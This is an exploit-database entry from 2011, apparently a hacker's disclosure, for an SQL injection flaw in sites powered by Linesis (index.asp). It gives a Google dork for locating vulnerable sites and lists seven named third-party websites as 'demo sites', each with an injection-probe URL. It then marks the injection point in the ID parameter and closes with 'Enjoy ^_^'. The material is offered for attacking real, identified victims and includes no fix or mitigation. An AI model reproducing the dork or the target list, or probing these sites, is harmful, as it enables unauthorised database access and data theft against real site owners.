Powered by Linesis(index.asp) sql-i Vulnerability



EKU-ID: 812 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-08-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title:Powered by Linesis(index.asp) sql-i Vulnerability
# Date: 11/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.linesis.com/
# Version:N/A
# Category:: webapps
# Google dork:intext:"Powered by Linesis" inurl:"index.asp?id="
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
demo Sites
1-http://www.guldogan.com/index.asp?ID=152&Lang=EN%27
2-http://kentotel.com.tr/index.asp?ID=152&Lang=EN%27
3-http://www.gulser.com.tr/index.asp?ID=152&Lang=EN%27
4-http://www.devaturizm.com.tr/index.asp?ID=2&Lang=EN%27
5-http://www.eceabroad.com/index.asp?ID=254.355&Lang=EN%27
6-http://www.ahmeteserler.com/index.asp?ID=274&Page=73&Lang=EN%27
7-http://www.fresan.com.tr/index.asp?ID=152&Lang=EN%27


Exploit

http://targets/index.asp?ID=152&Lang=EN'

http://targets/index.asp?id=152&Lang=EN'[ Inject Here]

Enjoy ^_^
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team